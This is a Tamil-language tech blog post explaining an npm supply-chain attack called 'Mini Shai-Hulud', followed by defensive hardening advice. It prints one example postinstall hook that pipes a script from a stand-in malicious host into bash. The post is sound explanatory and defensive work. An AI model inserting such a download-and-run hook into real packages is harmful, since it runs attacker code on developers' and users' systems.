செய்தி என்ன?
கடைசியாக சில நாட்களுக்கு முன்பு, பாதுகாப்பு ஆராய்ச்சியாளர்கள் npm ரெஜிஸ்ட்ரியில் Mistral (LLM ஃப்ரேம்வொர்க்), UiPath (RPA) மற்றும் TanStack (React‑Router) சார்ந்த பாக்கேஜ்களில் சிறு பின்ஹுக் (backdoor) சேர்க்கப்பட்டதை கண்டுபிடித்தார்கள். இந்த தாக்குதலுக்கு "Mini Shai‑Hulud" என்ற பெயர். பாக்கேஜ் install ஆகும் போது, postinstall ஸ்கிரிப்ட் தன்னிச்சையாக தொலைநிலை சர்வரிலிருந்து தீங்கு விளைவிக்கும் கோடை pull‑அண்டு‑run செய்கிறது.
தொலைநிலை ஸ்கிரிப்ட் எப்படி வேலை செய்கிறது?
npm install செய்யும் ஒவ்வொரு முறையும், பாக்கேஜ் உள்ள postinstall ஸ்கிரிப்ட் கீழ் காட்டியபடி ஒரு curl‑bash ஒர்லைனர் இயக்கும்:
#!/usr/bin/env node
require('child_process').execSync('curl -s https://malicious.example.com/install.sh | bash');
அது crypto‑miner, credential‑stealer அல்லது பிற malicious payload ஐ system‑ல் படைக்கலாம். டெவலப்பர்கள் postinstall‑ஐப் பார்த்து review செய்யாமல் விடுவதால், இந்த கொடூரம் எளிதாக பறிக்கிறது.
எது பாதிக்கப்பட்டது?
- Mistral:
mistral-client,mistral-utilsபோன்ற பாக்கேஜ்கள். இந்திய fintech மற்றும் e‑commerce start‑ups இவைகளை LLM‑ஆதாரமாக பயன்படுத்துகின்றன. - UiPath:
uipath-node-sdk– bots‑ஐ Node‑லிருந்து trigger செய்யப் பயன்படும். - TanStack (React‑Router):
react-router-dom-helpers,router-guardபோன்ற சிறிய utility பாக்கேஜ்கள். React‑Router தான் பெரும்பாலான web‑app‑களின் backbone, எனவே impact பெரியது.
இந்தச் சிக்கல் இந்திய டெவலப்பருக்கு ஏன் முக்கியம்?
நம்முடைய பல startup‑கள், e‑commerce, health‑tech, even govt portals எல்லாம் npm‑ல் நம்பிக்கை வைத்து கட்டிக்கொள்கின்றன. ஒரு compromised பாக்கேஜ் production server‑ல் crypto‑miner‑ஆக மாறினால், electricity bill‑கள் sky‑high ஆகும், data breach‑கள் ஏற்பட்டு UPI, GPay, PayTM போன்ற payment gateway‑கள் ஆபத்தில் படும்.
உங்கள் project‑ஐ இப்போதே secure பண்ண எப்படி?
- முதலில், lock‑file‑ஐ audit பண்ணுங்கள்.
npm auditஓடிச்செல்ல,postinstallscript கொண்ட package எதுவும் இல்லையா பாருங்கள். - Version‑களை pin பண்ணுங்கள்.
package-lock.json‑ல் exact version‑களை எழுதுங்கள், ^ அல்லது ~ பயன்படுத்தாதீர்கள். - CI pipeline‑ல்
npm ci --ignore-scriptsபயன்படுத்தி, scripts-ஐ manual review‑க்கு மட்டும் enable பண்ணுங்கள். - node_modules மற்றும் lock‑file‑ஐ delete பண்ணி, clean machine‑ல்
npm ciரன் பண்ணுங்கள். - install நேரம் network traffic‑ஐ monitor பண்ணுங்கள். unknown domain‑க்கு outbound call வந்தால் flag பண்ணுங்கள்.
நீண்டகால பாதுகாப்பு நடைமுறைகள்
npm‑ஐ “trust but verify” mindset‑ல வைத்திருக்க வேண்டும்.
- Production‑ல்
npm ci --prefer-offlineபயன்படுத்தி, cached packages‑ஐ மட்டும் install பண்ணுங்கள். - Dependabot, Snyk போன்ற automated security tools‑ஐ enable பண்ணி, suspicious
postinstallhook-களை flag செய்யுங்கள். - critical automation code‑ஐ Go அல்லது Rust போன்ற compiled language‑ல எழுதுங்கள் – supply‑chain attack‑களுக்கு அது hard target.
TamilTech-ஓட கருத்து
JavaScript இன் supply‑chain attack‑கள் இப்போது சாதாரணம். Mini Shai‑Hulud போல “minor utility” பாக்கேஜ்-களும் weapon‑ஆக மாறலாம். நம்மை எல்லாம் npm install‑ஐ ஒரு security event மாதிரி treat பண்ணவேண்டும்.
குறிப்பாக, புதிய maintainer‑களின் பாக்கேஜ்-களை எடுக்கும்முன் அவர்களின் GitHub activity, stars, followers‑ஐ check பண்ணுங்கள். Few followers மற்றும் zero issues என்றால், அது red flag தான்.
அடுத்தது என்ன?
npm தான் malicious பாக்கேஜ்-களை takedown பண்ணியிருக்கிறது, ஆனா நீங்கள் ஏற்கனவே install செய்து இருந்தால் impact இருந்தே இருக்கும். அடுத்த சில நாட்களில் npm security advisory‑கள் வந்து, fake patches வேகமாக வெளியாகலாம். அதனால், உங்கள் lock‑file‑ஐ regular‑ஆக update பண்ணி, security alerts‑ஐ follow பண்ணுங்கள்.
நாங்கள் தொடர்ந்து இந்த விஷயத்தை track பண்ணி, எந்த புதிய indicator of compromise (IOC) வந்தாலும் இங்குப் புதுப்பித்து தருவோம்.




கருத்துகள் (0)
Be the first to comment!